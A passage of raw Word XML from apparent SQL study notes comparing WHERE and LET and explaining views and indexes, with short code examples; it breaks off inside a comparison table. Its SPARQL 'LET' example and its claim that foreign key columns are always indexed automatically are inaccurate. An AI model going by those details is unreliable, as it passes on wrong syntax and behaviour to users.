        <w:t xml:space="preserve"> (Language Integrated Query) in programming languages like C#, WHERE is used to filter collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A0418"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var result = employees.Where(e =&gt; e.DepartmentId == 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BBC631" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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2. LET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAF057E"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ontext</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Typically used in programming languages like JavaScript, Python, or functional programming, and in certain query languages like </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SPARQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cypher</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for graph databases like Neo4j).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68727562"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In programming, LET is used to assign values to variables or define local bindings within a certain scope. In SQL-like query languages, it is often used for variable assignment or defining intermediate values in queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0E1CCD" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Example in JavaScript:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A73A309"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let x = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214283D0"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onsole.log(x);  // Output: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC7797D"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n this case, LET declares a block-scoped variable x and assigns it a value of 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C695A" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Example in SPARQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2A3B3"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ELECT ?name WHERE {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EC332"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  ?person a ex:Person .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D345B5"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  LET ?name = ?person</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292603DA"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  FILTER (?name = "John")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E8688"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552BDC0F"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Here, LET is used to assign the value of ?person to a variable ?name for use in the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA5FE53" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Key Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A6596"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WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used in filtering data or records based on conditions in SQL, programming queries, and LINQ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7DE25"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LET</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is primarily used for variable declarations or assignments in various programming languages (like JavaScript, Python) and some query languages (SPARQL, Cypher) for temporary or intermediate value assignments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2032F" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D128CC"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WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> filters records based on conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16E45C" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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LET</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to assign values to variables or define intermediate bindings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF60997" w14:textId="4B31A971" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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BFF461D">
          <v:rect id="_x0000_i2995" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3249C858" w14:textId="51635D55" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="001D1EE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="717" w:name="_Toc196308197"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is View and Index in SQL?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="717"/>
    </w:p>
    <w:p w14:paraId="5A5E9F00" w14:textId="4E195AE6" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2" w:rsidP="0085313D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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View in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06B137"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a virtual table in SQL that is defined by a query. It does not store data itself but provides a way to look at the data in one or more tables, typically simplifying complex queries and ensuring data security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC9929A" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Key Points about Views:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3209EF18"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Virtual Table</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A view acts like a table in SQL but does not actually store data. Instead, it stores a query that is executed when you query the view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42263AB2"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Simplification</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Views are often used to simplify complex queries, especially when the same query is repeatedly used in multiple places.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6835F"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ata Security</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Views can be used to restrict access to certain columns or rows of a table, providing a way to control the visibility of sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420AC301"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Read-Only/Updatable</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Depending on the complexity of the query, views can either be </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>updatable</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., if they are based on a single table with no aggregations or joins).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7E1FE" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Syntax for Creating a View:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D5A4F1"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VIEW view_name AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2578F5"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ELECT column1, column2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9E2CD1"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FROM table_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A1149"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WHERE condition;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E602AD" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64016290"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VIEW Employee_View AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F259A"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ELECT employee_id, employee_name, department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC23F04"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lastRenderedPageBreak/>
        <w:t>FROM employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F84D87"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WHERE status = 'Active';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2FC0C"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You can then query the view like a table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044C478F"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ELECT * FROM Employee_View;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D61DB56" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Use Cases for Views:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2880C2"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omplex Query Simplification</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you need to join multiple tables frequently, you can create a view that encapsulates that join.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E05888"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ata Security</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hide sensitive information by providing access to only certain columns in a view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B1533D"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onsistency</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Views ensure that a consistent result set is returned, particularly when you want to enforce specific filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D33256" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="00000000" w:rsidP="0085313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3450556">
          <v:rect id="_x0000_i2996" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="453EEBA7" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Index in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E33A6A"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An </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL is a database object that improves the speed of data retrieval operations on a table at the cost of additional space and slower write operations (INSERT, UPDATE, DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D44B8B1" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Key Points about Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106E4362"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Performance Improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes improve the speed of data retrieval queries by allowing the database engine to find rows more quickly without scanning the entire table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711BBB59"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Unique and Non-Unique</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An index can be unique (ensuring no duplicate values in the indexed column(s)) or non-unique (allowing duplicates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF40BD"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Structure</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Indexes are usually implemented as </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B-trees</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Balanced Trees) or </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hash indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These structures enable fast searching and retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289372CB"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ost</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While indexes speed up SELECT queries, they introduce overhead on DML (Data Manipulation Language) operations like INSERT, UPDATE, DELETE, as the index also needs to be updated whenever the underlying data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7B14F" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Syntax for Creating an Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49FC31"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INDEX index_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CAB22"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ON table_name (column_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E0E32" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32135BA6"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INDEX idx_employee_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAFADB9"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ON employees (employee_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA85173"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n this example, an index idx_employee_name is created on the employee_name column of the employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4967F2" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Types of Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5425671C"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Primary Key Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automatically created when a primary key is defined. It ensures that the data is unique and allows fast searching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F17FDA"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Unique Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that all values in the indexed column(s) are unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C2B081"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omposite Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Created on multiple columns, allowing for faster lookups on queries that filter by multiple columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA0454"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Full-Text Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for indexing large text data for fast full-text searches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D84DE96"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lustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The data in the table is physically sorted based on the index. Each table can have only one clustered index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BFE27" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Example of Composite Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31F9F4"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INDEX idx_name_department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614EF309"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ON employees (employee_name, department_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE819A"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This index will speed up queries that filter by both employee_name and department_id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094EC8EA" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Use Cases for Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7E75ED"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Improving Query Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes significantly speed up read operations (SELECT queries) by reducing the time needed to locate specific rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447ED26C"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Primary and Foreign Key Constraints</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes are automatically created on primary keys and foreign key columns, which improves the performance of joins and data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B6475" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="00000000" w:rsidP="0085313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EAA8E8">
          <v:rect id="_x0000_i2997" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D29B392" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Differences Between View and Index:</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23"/>
        <w:gridCol w:w="3853"/>
        <w:gridCol w:w="4728"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="398073E4" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23DAC46D" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AAE6204" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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View</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF2F3D1" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="3E4B7B40" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FEAB8F0"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efinition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
